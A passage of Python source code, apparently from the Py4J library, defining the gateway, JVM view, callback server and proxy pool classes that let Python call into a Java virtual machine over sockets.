self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
    explicitly imported Java classes. For example, if you call
    java_import(gateway.jvm, "com.example.Class1"),
    then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
        if jvm_id is None:
            self._jvm_id = proto.DEFAULT_JVM_ID
        else:
            self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name == "__call__":
raise Py4JError("Trying to call a package.")
if name.startswith("__") and name.endswith("__"):
# don't propagate any magic methods to Java
raise AttributeError
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
            answer, self._gateway_client, self._id, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
* The `java_process` field of a `JavaGateway` instance is a
subprocess.Popen object for the Java process that the `JavaGateway`
is connected to, or None if the `JavaGateway` connected to a preexisting
Java process (in which case we cannot directly access that process from
Python).
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None,
java_process=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
            Otherwise, callbacks won't be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
:param java_process: the subprocess.Popen object for the Java process
that the `JavaGateway` shall connect to, if available.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = self._create_gateway_client()
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = self._create_gateway_property()
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
self.java_process = java_process
def _create_gateway_client(self):
gateway_client = GatewayClient(
gateway_parameters=self.gateway_parameters)
return gateway_client
def _create_gateway_property(self):
gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool(),
self.gateway_parameters.enable_memory_management)
if self.python_server_entry_point:
gateway_property.pool.put(
self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
        This is for advanced usage only and should only be set before the
        gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
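    # Hedged sketch (editor's addition) of how an isolated view is typically
    # used; "com.example.Class1" is a hypothetical class and java_import is
    # the helper defined elsewhere in this module:
    #   module_view = gateway.new_jvm_view("my_module")
    #   java_import(module_view, "com.example.Class1")  # visible only in this view
    #   instance = module_view.Class1()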
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
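    # Hedged sketch (editor's addition): creating a 5-element java.lang.String
    # array through the method above:
    #   string_class = gateway.jvm.java.lang.String
    #   string_array = gateway.new_array(string_class, 5)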
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
        is garbage collected on the Python side. This method, or gc.collect(),
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
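    # Hedged sketch (editor's addition): getting the help page of a Java class
    # as a string, filtered to members whose signature starts with "add":
    #   page = gateway.help(gateway.jvm.java.util.ArrayList,
    #                       pattern="add*", display=False)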
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False, cwd=None):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
        :param redirect_stderr: where to redirect the JVM stderr.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
            Ctrl-C/SIGINT won't interrupt the JVM. If the Python process dies,
            the Java process will stay alive, which may be a problem in some
            scenarios.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:param cwd: If not None, path that will be used as the current working
directory of the Java process.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth, cwd=cwd, return_proc=True)
if enable_auth:
_port, _auth_token, proc = _ret
else:
_port, proc, _auth_token = _ret + (None, )
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token),
java_process=proc)
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
        :param pool: the pool responsible for tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
        # Lock is used to isolate critical regions like connection creation.
        # Some code can produce exceptions when run in parallel, but
        # they will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
        # Maybe the thread needs to be cleaned up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = self._create_connection(
socket_instance, input)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
_garbage_collect_proxy(self.pool, obj_id)
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
                    # We're sending something to prevent blocking, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
logger.info("Closing down callback connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
